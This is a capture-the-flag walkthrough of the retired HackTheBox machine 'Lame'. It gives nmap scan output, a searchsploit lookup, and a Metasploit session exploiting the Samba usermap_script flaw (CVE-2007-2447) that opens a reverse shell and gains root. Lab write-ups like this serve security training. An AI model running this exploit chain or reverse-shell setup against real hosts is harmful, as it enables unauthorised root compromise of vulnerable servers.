In this walk through, we will be going through the Lame room from HackTheBox. This room is rated as easy on the platform and it consists of exploitation of a vulnerable Samba version to get root. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Lame |
IPaddress | 10.10.10.3 |
Difficulty | Easy |
OS | Linux |
Description | Lame is a beginner level machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement. |
Enumeration:
- I started off with an nmap scan on the target IP with aggressive flag set and found 4 ports opened – 21 (FTP), 22 (SSH), 139 and 445 (Samba).
$ sudo nmap -A 10.10.10.3 Nmap scan report for 10.10.10.3 Host is up (0.25s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.14.2 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status | vulners: | cpe:/a:vsftpd:vsftpd:2.3.4: | PRION:CVE-2011-2523 10.0 https://vulners.com/prion/PRION:CVE-2011-2523 | EDB-ID:49757 10.0 https://vulners.com/exploitdb/EDB-ID:49757 *EXPLOIT* |_ 1337DAY-ID-36095 10.0 https://vulners.com/zdt/1337DAY-ID-36095*EXPLOIT* 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) | vulners: | cpe:/a:openbsd:openssh:4.7p1: | SSV:78173 7.8 https://vulners.com/seebug/SSV:78173 *EXPLOIT* | SSV:69983 7.8 https://vulners.com/seebug/SSV:69983 *EXPLOIT* | EDB-ID:24450 7.8 https://vulners.com/exploitdb/EDB-ID:24450 *EXPLOIT* | EDB-ID:15215 7.8 https://vulners.com/exploitdb/EDB-ID:15215 *EXPLOIT* | SECURITYVULNS:VULN:8166 7.5 https://vulners.com/securityvulns/SECURITYVULNS:VULN:8166 | PRION:CVE-2010-4478 7.5 https://vulners.com/prion/PRION:CVE-2010-4478 | SSV:20512 7.2 https://vulners.com/seebug/SSV:20512 *EXPLOIT* | PRION:CVE-2011-1013 7.2 https://vulners.com/prion/PRION:CVE-2011-1013 | PRION:CVE-2008-1657 6.5 https://vulners.com/prion/PRION:CVE-2008-1657 | CVE-2008-1657 6.5 https://vulners.com/cve/CVE-2008-1657 | SSV:60656 5.0 https://vulners.com/seebug/SSV:60656 *EXPLOIT* | PRION:CVE-2011-2168 5.0 https://vulners.com/prion/PRION:CVE-2011-2168 | PRION:CVE-2010-5107 5.0 https://vulners.com/prion/PRION:CVE-2010-5107 | CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107 | PRION:CVE-2010-4755 4.0 https://vulners.com/prion/PRION:CVE-2010-4755 | PRION:CVE-2010-4754 4.0 https://vulners.com/prion/PRION:CVE-2010-4754 | PRION:CVE-2012-0814 3.5 https://vulners.com/prion/PRION:CVE-2012-0814 | PRION:CVE-2011-5000 3.5 https://vulners.com/prion/PRION:CVE-2011-5000 | CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000 | CVE-2008-5161 2.6 https://vulners.com/cve/CVE-2008-5161 | PRION:CVE-2011-4327 2.1 https://vulners.com/prion/PRION:CVE-2011-4327 | CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327 | PRION:CVE-2008-3259 1.2 https://vulners.com/prion/PRION:CVE-2008-3259 | CVE-2008-3259 1.2 https://vulners.com/cve/CVE-2008-3259 |_ SECURITYVULNS:VULN:9455 0.0 https://vulners.com/securityvulns/SECURITYVULNS:VULN:9455 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: broadband router|remote management|WAP|printer|general purpose|power-device Running (JUST GUESSING): Arris embedded (92%), Dell embedded (92%), Linksys embedded (92%), Tranzeo embedded (92%), Xerox embedded (92%), Linux 2.4.X|2.6.X (92%), Dell iDRAC 6 (92%), Raritan embedded (92%) OS CPE: cpe:/h:dell:remote_access_card:6 cpe:/h:linksys:wet54gs5 cpe:/h:tranzeo:tr-cpq-19f cpe:/h:xerox:workcentre_pro_265 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:2.6 cpe:/o:dell:idrac6_firmware Aggressive OS guesses: Arris TG862G/CT cable modem (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Linux 2.6.8 - 2.6.30 (92%), Dell iDRAC 6 remote access controller (Linux 2.6) (92%), Raritan Dominion PX DPXR20-20L power control unit (92%), LifeSize video conferencing system (Linux 2.4.21) (92%), DD-WRT v24-sp1 (Linux 2.4.36) (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_ms-sql-info: ERROR: Script execution failed (use -d to debug) |_smb-os-discovery: ERROR: Script execution failed (use -d to debug) |_smb-security-mode: ERROR: Script execution failed (use -d to debug) |_smb2-time: Protocol negotiation failed (SMB2) TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 248.70 ms 10.10.14.1 2 250.07 ms 10.10.10.3 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 91.65 seconds
- Looked for the vsftpd version for known exploits using searchsploit and found the famous backdoor vulnerability which also have a metasploit module for it.
searchsploit vsftpd 2.3.4
Exploitation:
- Next, tried the exploit from metasploit on the target however it failed.
- Now, at this point, i fell into a rabbit hole and was enumerating very deep but didn’t found any low hanging fruit for the initial access. Checked the Samba version 3.0.20 and found out that it was vulnerable to CVE-2007-2447. Next, i used the exploit from metasploit for the concerned CVE and got a root shell.
$ msfconsole -q [*] Starting persistent handler(s)... msf6 > search CVE-2007-2447 msf6 > use 0 msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.2 LHOST => 10.10.14.2 msf6 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3 RHOST => 10.10.10.3 msf6 exploit(multi/samba/usermap_script) > exploit [*] Started reverse TCP handler on 10.10.14.2:4444 [*] Command shell session 1 opened (10.10.14.2:4444 -> 10.10.10.3:35378) at 2023-12-01 12:56:19 +0530 id uid=0(root) gid=0(root)
Getting Flags:
- Captured the user and root flag and completed the room.
Also Read: HTB – Intentions
Conclusion:
So that was “Lame” for you. We started off with a regular nmap aggressive scan and found Samba version 3.0.20 running on the target. Checked metasploit for known exploit and found one. Fired it on the target and got root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.